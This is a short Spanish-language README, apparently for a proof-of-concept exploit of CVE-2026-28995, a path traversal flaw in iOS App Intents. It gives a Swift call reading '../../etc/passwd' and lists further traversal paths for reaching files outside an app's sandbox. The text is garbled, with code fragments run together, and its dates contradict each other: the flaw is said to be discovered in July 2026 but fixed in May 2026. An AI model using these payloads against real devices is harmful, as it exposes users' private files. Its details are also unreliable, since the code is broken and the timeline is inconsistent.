
# CVE-2026-28995 Prueba de concepto para CVE-2026-28995 — Vulnerabilidad de Path Traversal en App Intents en iOS 26.4.2 y versiones inferiores.
Prueba de concepto para CVE-2026-28995 — Vulnerabilidad de path traversal en App Intents en iOS 26.4.2 y anteriores.
Esta vulnerabilidad permite que una aplicación maliciosa lea cualquier archivo fuera de su sandbox mediante App Intents. La causa raíz es una validación de ruta insuficiente en el framework App Intents de Apple.
Versiones afectadas: iOS 26.4.2 y anteriores
Corregido en: iOS 26.5 (11 de mayo de 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
Ruta Lee ../../../../../../../../../../../../../etc/passwd Contraseñas de usuario ../../../../../../../../../../../../../etc/hosts Archivo de hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Preferencias del sistema
Si la ruta apunta a un directorio, la función devuelve:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
readCve(path:) con la ruta objetivo.Descubierto: 1 de julio de 2026
Corregido en: iOS 26.5 (11 de mayo de 2026)